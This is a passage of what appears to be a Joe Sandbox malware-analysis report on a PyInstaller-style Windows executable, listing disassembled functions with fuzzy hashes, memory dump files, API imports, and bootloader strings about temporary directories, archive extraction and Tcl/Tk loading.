Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 211bbe4c03a2c9e19709eea43e59db97f44f9c905126379347a0abe1d957b26c
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: C051A436A1865182EB258B29C446338B3A0FB44F68F244131CE8D97796DF3BE847DB42

Function 00007FF6266521D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: a1dd6ed8bb6e939ec5aee5c867574fec49e81a7e64c8dc294ea554f1dcb81584
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 99516376A2865186EB648B29C48123837A4FB54F58F248131CE4D977DACF3BEC43DB42

Function 00007FF6266517B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 879ee294b041d1261857fb003c3f23da521644a5e89880ed0bed16a671ece215
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: 5D518136A1865186EB348B29D84123CB7A1FB45B58F245131CE4D97796CF3BE842EB83

Function 00007FF626651FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 5c15723f9d8d110dae8409bf479ccbd346f04ff7b9c1ab949eff293566ddfbae
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 8C51A336A1965185EB348B29C89163937A4FB54F58F244132CF4C977A6CF3BEC42DB82

Function 00007FF626651BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 0b953cad94872c14e49e6aaa01f6f517c3c3a94d178a433afb134b0b3956813c
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: DD517336A18A5586EB248B29C841338B7A1FB45F58F244131CE4D977A6CF3FE843DB42

Function 00007FF626655DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 0e7516cff020f4ca36b70fe38660309a0d5e30727981da211b8f3f711156a965
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: DF41A562C097CA44FDA589280D0D6B86680BFA3BA0D5952B4DD99D33D3DD0F7987EB03

Function 00007FF626659F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: c06c744af227e51e88989879729e79f2e66a9c4fcf8c6907d534cd702162cdc4
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 6741DF22724A5582EF04CF6ADE151A9A3A1FB48FD4F099033EE0D9BB58DE3EC4459742

Function 00007FF626658154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: a0357a3872e788fb73f71915f0bb014c9efecf01a5d579f3ec18b41db46b7a3d
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: 0E31C432B18B8281EB64DB25AC4113D7A94BB84BD0F14423CEA5E93BD6DF3DD0015B06

Function 00007FF6266695E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: ff445ea90c2f04409615032af334beda5386e8076ccc1fd82643c99ed02ae879
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: DEF068717182A68BDF988FA9A80262977D0F7083C0F448039D58DC3B14DE3DD8619F05

Function 00007FF62664D37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: e4cebbbc35a1d747081fb71ee75498edc2943405202994f1e62d2709ddd2d926
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: AFA00121A0C80BD1EA558B01ACA01352364BB51300F400071E00D810A0AE6EA810AB03

Function 00007FF6266476B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6266476C7
GetLastError.KERNEL32 ref: 00007FF6266476D9
GetProcAddress.KERNEL32 ref: 00007FF626647715
GetLastError.KERNEL32 ref: 00007FF626647727
GetProcAddress.KERNEL32 ref: 00007FF626647740
GetLastError.KERNEL32 ref: 00007FF626647752
GetProcAddress.KERNEL32 ref: 00007FF62664776B
GetLastError.KERNEL32 ref: 00007FF62664777D
GetProcAddress.KERNEL32 ref: 00007FF626647799
GetLastError.KERNEL32 ref: 00007FF6266477AB
GetProcAddress.KERNEL32 ref: 00007FF6266477C7
GetLastError.KERNEL32 ref: 00007FF6266477D9
GetProcAddress.KERNEL32 ref: 00007FF6266477F5
GetLastError.KERNEL32 ref: 00007FF626647807
GetProcAddress.KERNEL32 ref: 00007FF626647823
GetLastError.KERNEL32 ref: 00007FF626647835
GetProcAddress.KERNEL32 ref: 00007FF626647851
GetLastError.KERNEL32 ref: 00007FF626647863

Strings

Tcl_CreateThread, xrefs: 00007FF626647819, 00007FF62664783B
Tcl_Finalize, xrefs: 00007FF62664778F, 00007FF6266477B1
Tcl_SetVar2Ex, xrefs: 00007FF626647B27, 00007FF626647B49
Tcl_NewStringObj, xrefs: 00007FF626647ACB, 00007FF626647AED
Tcl_ConditionWait, xrefs: 00007FF626647989, 00007FF6266479AB
Tcl_EvalObjv, xrefs: 00007FF626647BDF, 00007FF626647C01
Tcl_FindExecutable, xrefs: 00007FF626647736, 00007FF626647758
Tcl_MutexFinalize, xrefs: 00007FF6266478FF, 00007FF626647921
Tcl_ConditionNotify, xrefs: 00007FF62664795B, 00007FF62664797D
Tcl_CreateInterp, xrefs: 00007FF62664770B, 00007FF62664772D
Tcl_JoinThread, xrefs: 00007FF626647875, 00007FF626647897
Tcl_GetCurrentThread, xrefs: 00007FF626647847, 00007FF626647869
Tcl_ThreadAlert, xrefs: 00007FF6266479E5, 00007FF626647A07
Tcl_EvalEx, xrefs: 00007FF626647BB1, 00007FF626647BD3
Tcl_CreateObjCommand, xrefs: 00007FF626647A6F, 00007FF626647A91
Tcl_SetVar2, xrefs: 00007FF626647A41, 00007FF626647A63
Tcl_GetVar2, xrefs: 00007FF626647A13, 00007FF626647A35
Failed to get address for %hs, xrefs: 00007FF6266476E8
Tk_GetNumMainWindows, xrefs: 00007FF626647C97, 00007FF626647CB9
Tcl_NewByteArrayObj, xrefs: 00007FF626647AF9, 00007FF626647B1B
Tcl_MutexUnlock, xrefs: 00007FF6266478D1, 00007FF6266478F3
Tcl_ThreadQueueEvent, xrefs: 00007FF6266479B7, 00007FF6266479D9
Tcl_Free, xrefs: 00007FF626647C3B, 00007FF626647C5D
Tcl_MutexLock, xrefs: 00007FF6266478A3, 00007FF6266478C5
GetProcAddress, xrefs: 00007FF6266476EF
Tcl_DeleteInterp, xrefs: 00007FF6266477EB, 00007FF62664780D
Tcl_FinalizeThread, xrefs: 00007FF6266477BD, 00007FF6266477DF
Tk_Init, xrefs: 00007FF626647C69, 00007FF626647C8B
Tcl_Init, xrefs: 00007FF6266476C0, 00007FF6266476DF
Tcl_DoOneEvent, xrefs: 00007FF626647761, 00007FF626647783
Tcl_GetString, xrefs: 00007FF626647A9D, 00007FF626647ABF
Tcl_Alloc, xrefs: 00007FF626647C0D, 00007FF626647C2F
Tcl_EvalFile, xrefs: 00007FF626647B83, 00007FF626647BA5
Tcl_ConditionFinalize, xrefs: 00007FF62664792D, 00007FF62664794F
Tcl_GetObjResult, xrefs: 00007FF626647B55, 00007FF626647B77

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 52a1b502162a3df9c55faab5425b307457f37b133d1d81136829d0f8869aa4da
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 4902E520A0DB0BD1FE249B66BD205B42BB5BF55794F441031C81E822A0EFBEB558FB53

Function 00007FF6266481C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6266488A7,?,?,00000000,00007FF626643CBB), ref: 00007FF62664821C

Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6266481F3
\, xrefs: 00007FF626648251
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF62664828D
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF626648363
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF626648230
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6266482C9
CreateDirectory, xrefs: 00007FF62664836C
%.*s, xrefs: 00007FF6266482FC

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 04a8cfa91c8a9c47066c1d2292dbf4f918ec7b05d4434c5f44187cc4d9a66969
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 3851D621A1C68391FF719B26EC612BA6391FF94780F444035EA0EC26D5EF6EE404AF43

Function 00007FF626642180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6266421AB
SelectObject.GDI32 ref: 00007FF6266421F2
DrawTextW.USER32 ref: 00007FF626642215
SelectObject.GDI32 ref: 00007FF62664222B
ReleaseDC.USER32 ref: 00007FF62664223B
MoveWindow.USER32 ref: 00007FF62664228B
MoveWindow.USER32 ref: 00007FF6266422CB
MoveWindow.USER32 ref: 00007FF62664231E
MoveWindow.USER32 ref: 00007FF626642366

Strings

P%, xrefs: 00007FF6266421FF

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b4d3d7b245f7f635bbbeb699d513663e80868ba9c8c7cce30d2e9e131e67c785
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FB510726614BA286DA349F22F8181BAB7A1F798B61F004121EFDE83794DF7DD085DB10

Function 00007FF6266480B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6266480EF
GetWindowLongPtrW.USER32 ref: 00007FF62664816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF626648182
GetLastError.KERNEL32 ref: 00007FF62664818C
SetWindowLongPtrW.USER32 ref: 00007FF6266481A3

Strings

Needs to remove its temporary files., xrefs: 00007FF626648175

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 1426544a9756ec20af9dff9ae31493eface032b7b33c81044994c0759084944c
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 56214F21B09A83C2EF558B7ABC641796350FF88B90F584235DA2DC33D8DE6DD5A19B03

Function 00007FF626656300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266569CC

Strings

p, xrefs: 00007FF6266563F5
p, xrefs: 00007FF62665646D
f, xrefs: 00007FF626656465
-, xrefs: 00007FF6266563D9
:, xrefs: 00007FF6266564FC

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: ec7ddd7b67d6b4d5751b74ee3fc6fcfd7aba4e139fa18444d0589274eba5fc10
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 5A12C372E0C25386FF205B15D91627976A1FB40754FA44035E68AC6AE6DF3EE880EF03

Function 00007FF626651038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626651078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626651440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266516DF

Strings

f, xrefs: 00007FF6266512C5
p, xrefs: 00007FF626651182
p, xrefs: 00007FF62665111D
f, xrefs: 00007FF62665117A
f, xrefs: 00007FF626651110

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 9632e876b8c1ce5351e1f41cf479b18e296a2ed9016b031683b40ff00222578a
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 4712D736E0C24386FF209A15E856679F661FB40754F884135E699C7AC6DF7EE880AF03

Function 00007FF626641050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF626641108
malloc, xrefs: 00007FF62664110F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266410CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF626641098
fread, xrefs: 00007FF6266411FD
fseek, xrefs: 00007FF6266410D3
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266411F6

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

